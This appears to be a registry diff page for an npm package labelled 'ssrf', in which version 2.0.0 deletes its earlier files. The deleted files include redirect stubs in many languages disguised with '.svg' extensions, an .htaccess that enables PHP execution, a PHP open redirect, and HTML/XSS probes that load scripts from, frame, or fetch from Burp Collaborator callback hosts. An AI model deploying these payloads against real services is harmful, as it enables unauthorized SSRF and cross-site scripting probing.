m0m0x01d 1.1.2 → 2.0.0

Sign up to get free protection for your applications and to get access to all the features.
package/package.json CHANGED
@@ -1,6 +1,6 @@
1
1
  {
2
2
  "name": "m0m0x01d",
3
- "version": "1.1.2",
3
+ "version": "2.0.0",
4
4
  "description": "ssrf",
5
5
  "main": "index.html",
6
6
  "scripts": {
package/.htaccess DELETED
@@ -1,8 +0,0 @@
1
- <IfModule mod_php.c>
2
- # Enable PHP execution
3
- AddType application/x-httpd-php .php
4
- AddHandler application/x-httpd-php .php
5
- </IfModule>
6
-
7
- # Ensure the PHP engine is enabled
8
- php_flag engine on
package/redirect.svg.asp DELETED
@@ -1 +0,0 @@
1
- <% Response.Redirect("https://example.com") %>
package/redirect.svg.aspx DELETED
@@ -1 +0,0 @@
1
- <% Response.Redirect("https://example.com") %>
package/redirect.svg.cfm DELETED
@@ -1 +0,0 @@
1
- <cflocation url="https://example.com">
package/redirect.svg.cs DELETED
@@ -1 +0,0 @@
1
- return Redirect("https://example.com");
@@ -1 +0,0 @@
1
- return Redirect("https://example.com");
package/redirect.svg.html DELETED
@@ -1,25 +0,0 @@
1
- <!DOCTYPE html>
2
- <html lang="en">
3
- <head>
4
- <meta charset="UTF-8">
5
- <meta name="viewport" content="width=device-width, initial-scale=1.0">
6
- <title>Redirect</title>
7
- <script>
8
- window.onload = function() {
9
- // Get the URL query parameter
10
- const urlParams = new URLSearchParams(window.location.search);
11
- const targetUrl = urlParams.get('url');
12
-
13
- // If a valid URL is provided, redirect to it
14
- if (targetUrl) {
15
- window.location.href = targetUrl;
16
- } else {
17
- document.body.innerHTML = "No URL provided for redirection.";
18
- }
19
- }
20
- </script>
21
- </head>
22
- <body>
23
- </body>
24
- </html>
25
-
package/redirect.svg.js DELETED
@@ -1 +0,0 @@
1
- res.redirect('https://example.com');
package/redirect.svg.jsp DELETED
@@ -1,3 +0,0 @@
1
- <%
2
- response.sendRedirect("https://example.com");
3
- %>
package/redirect.svg.php DELETED
@@ -1,21 +0,0 @@
1
- <?php
2
- // Get the target URL from the 'next_url' query parameter
3
- $next_url = isset($_GET['next_url']) ? $_GET['next_url'] : 'https://9lv13zw73wdy5t6hjxcpw5tz9qfh36.burpcollaborator.net';
4
-
5
- // Set the appropriate headers for the 302 redirect
6
- header("HTTP/1.1 302 Found");
7
- header("Location: $next_url");
8
-
9
- // Optional: Set additional headers if required
10
- header("Cache-Control: public, max-age=0");
11
- header("Set-Cookie: sites=; expires=Thu, 01 Jan 1970 00:00:00 GMT; Max-Age=0; Path=/");
12
- header("Set-Cookie: sessionid=; expires=Thu, 01 Jan 1970 00:00:00 GMT; Max-Age=0; Path=/");
13
- header("Strict-Transport-Security: max-age=31536000; includeSubDomains; preload");
14
- header("X-Frame-Options: SAMEORIGIN");
15
- header("X-XSS-Protection: 1; mode=block");
16
- header("X-Content-Type-Options: nosniff");
17
- header("Content-Security-Policy: frame-ancestors 'self'; base-uri 'self'; form-action 'self' https://*.example.com; upgrade-insecure-requests");
18
-
19
- // Ensure the connection is closed after the headers
20
- exit();
21
-
package/redirect.svg.pl DELETED
@@ -1 +0,0 @@
1
- print "Location: https://example.com\n\n";
package/redirect.svg.py DELETED
@@ -1,2 +0,0 @@
1
- from flask import redirect
2
- return redirect("https://example.com")
package/redirect.svg.rb DELETED
@@ -1 +0,0 @@
1
- redirect_to "https://example.com"
package/redirect.svg.xml DELETED
@@ -1,3 +0,0 @@
1
- <?xml version="1.0" encoding="UTF-8"?>
2
- <?xml-stylesheet type="text/xsl" href="redirect.svg.xsl"?>
3
- <root/>
package/redirect.svg.xsl DELETED
@@ -1,14 +0,0 @@
1
- <?xml version="1.0" encoding="UTF-8"?>
2
- <xsl:stylesheet xmlns:xsl="http://www.w3.org/1999/XSL/Transform" version="1.0">
3
- <xsl:template match="/">
4
- <xsl:variable name="url" select="'https://086sqqjyqn0pskt86ozgjwgqwh2aqz.burpcollaborator.net'"/>
5
- <html>
6
- <head>
7
- <meta http-equiv="refresh" content="0; url={$url}" />
8
- </head>
9
- <body>
10
- Redirecting to <xsl:value-of select="$url" />
11
- </body>
12
- </html>
13
- </xsl:template>
14
- </xsl:stylesheet>
@@ -1,11 +0,0 @@
1
- <!DOCTYPE html>
2
- <html lang="en">
3
- <head>
4
- <meta charset="UTF-8">
5
- <meta http-equiv="refresh" content="0; url=https://www.example.com">
6
- <title>Redirecting...</title>
7
- </head>
8
- <body>
9
- <p>If you are not redirected automatically, follow this <a href="https://www.example.com">link to the new page</a>.</p>
10
- </body>
11
- </html>
@@ -1,15 +0,0 @@
1
- <!DOCTYPE HTML>
2
- <html lang="en-US">
3
- <head>
4
- <meta charset="UTF-8">
5
- <meta http-equiv="refresh" content="0; url=http://example.com">
6
- <script type="text/javascript">
7
- window.location.href = "http://example.com"
8
- </script>
9
- <title>Page Redirection</title>
10
- </head>
11
- <body>
12
- <!-- Note: don't tell people to `click` the link, just tell them that it is a link. -->
13
- If you are not redirected automatically, follow this <a href='http://example.com'>link to example</a>.
14
- </body>
15
- </html>
package/test.html DELETED
@@ -1,2 +0,0 @@
1
- <h1>testing</h1>
2
- <script src="https://m8veqcjkq90bs6tu6az2jigcw32xqm.burpcollaborator.net"></script>
package/testing.svg.html DELETED
@@ -1 +0,0 @@
1
- <iframe src="https://wttobm4ubjlldge4rkkc4s1mhdn3bs.burpcollaborator.net"></iframe>
package/xss.svg.html DELETED
@@ -1,4 +0,0 @@
1
- <script>
2
- window.location.href = 'https://7bjztxm5tu3wvrwf9v2nm3jxzo5gt5.burpcollaborator.net';
3
- </script>
4
-
package/xss1.svg.html DELETED
@@ -1,6 +0,0 @@
1
- <script>
2
- fetch('https://7bjztxm5tu3wvrwf9v2nm3jxzo5gt5.burpcollaborator.net/api').then(response => {
3
- console.log(response);
4
- });
5
- </script>
6
-